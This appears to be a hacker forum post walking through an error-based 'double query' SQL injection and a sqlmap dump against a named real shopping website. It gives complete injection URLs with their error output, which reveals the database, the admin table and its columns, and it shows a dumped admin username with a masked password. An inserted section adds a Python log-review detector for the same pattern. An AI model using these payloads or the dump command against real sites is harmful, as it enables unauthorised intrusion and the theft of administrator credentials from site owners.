SQL injection double query + SQL Map
http://www.bigshops.co.il/links/browse.php?id=1%20and%20 (select%201%20from%20(select%20count(*),concat((select(select%20concat(cast(database()%20as%20char),0x7e))%20from%20information_schema.tables%20where%20table_schema=database()%20limit%200,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)
>>>Duplicate entry 'bigshops~1' for key
http://www.bigshops.co.il/links/browse.php?id=1%20and%20 (select%201%20from%20(select%20count(*),concat((select(select%20concat(cast(table_name%20as%20char),0x7e))%20from%20information_schema.tables%20where%20table_schema=database()%20limit%200,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)
>>>Duplicate entry 'admin~1' for key
http://www.bigshops.co.il/links/browse.php?id=1%20and%20 (select%201%20from%20(select%20count(*),concat((select(select%20concat(cast(column_name%20as%20char),0x7e))%20from%20information_schema.columns%20where%20table_name=0x61646d696e%20limit%201,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)
>>>Duplicate entry 'Username~1' for key 1
http://www.bigshops.co.il/links/browse.php?id=1%20and%20 (select%201%20from%20(select%20count(*),concat((select(select%20concat(cast(column_name%20as%20char),0x7e))%20from%20information_schema.columns%20where%20table_name=0x61646d696e%20limit%202,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)
>>>Duplicate entry 'Password~1' for key 1
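The four requests above share one signature: `count(*)` grouped by a `concat(..., floor(rand(0)*2))` key, which makes MySQL raise the `Duplicate entry '...~1'` error that carries the selected value back in the response. As an added example (not part of the original post), a log-review check for that signature; the function names, the sample query strings and the `shopdb` value are constructed for illustration.

```python
import re
from urllib.parse import unquote_plus

# All three must appear together in the decoded query string.
REQUEST_MARKERS = [
    re.compile(r"floor\s*\(\s*rand\s*\(\s*\d*\s*\)\s*\*\s*2\s*\)", re.I),
    re.compile(r"count\s*\(\s*\*\s*\)", re.I),
    re.compile(r"group\s+by", re.I),
]
SCHEMA_REF = re.compile(r"information_schema\s*\.\s*(tables|columns)", re.I)
# MySQL error text that carries the selected value back to the client.
LEAKED_ERROR = re.compile(r"Duplicate entry '(.*?)~[01]' for key", re.I)

def normalise(raw):
    """URL-decode up to three times and drop /**/ comments used as spacing."""
    prev, cur = None, raw
    for _ in range(3):
        if cur == prev:
            break
        prev, cur = cur, unquote_plus(cur)
    return re.sub(r"/\*.*?\*/", " ", cur)

def inspect(query_string, response_body=""):
    """Flag the double-query pattern in a request and the leak in its response."""
    q = normalise(query_string)
    leak = LEAKED_ERROR.search(response_body)
    return {
        "double_query": all(m.search(q) for m in REQUEST_MARKERS),
        "schema_enum": bool(SCHEMA_REF.search(q)),
        "leaked": leak.group(1) if leak else None,
    }

# Constructed (query string, response body) pairs, not taken from real logs.
SAMPLES = [
    ("id=1%20and%20(select%201%20from%20(select%20count(*),concat((select%20database()),"
     "0x7e,floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)",
     "Duplicate entry 'shopdb~1' for key 1"),
    ("id=1%2520AND%2520(SELECT%25201%2520FROM(SELECT%2520COUNT(*),CONCAT(version(),"
     "FLOOR(RAND(0)*2))x%2520FROM%2520information_schema.tables%2520GROUP/**/BY%2520x)a)", ""),
    ("id=1", ""),
    ("q=group+by+price&id=7", ""),
]

if __name__ == "__main__":
    for qs, body in SAMPLES:
        print(inspect(qs, body), qs[:40])
```

A non-empty `leaked` field means the application returned raw database errors to the client; parameterised queries and generic error pages remove both the injection point and the leak.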
Then I dumped the data with sqlmap:
jincorn@jincorn-R00t/pentest/database/sqlmap$ ./sqlmap.py -o --url="http://www.bigshops.co.il/links/browse.php?id=1 " -D bigshops -T admin --dump
Database: bigshops
Table: admin
[1 entry]
+----+----------------------------------+----------+
| ID | Password                         | Username |
+----+----------------------------------+----------+
| 1  | ***********************          | alondb   |
+----+----------------------------------+----------+
>>user : alondb
>>pass : **************************
Thanks: cep khan, ksatria tanpa nama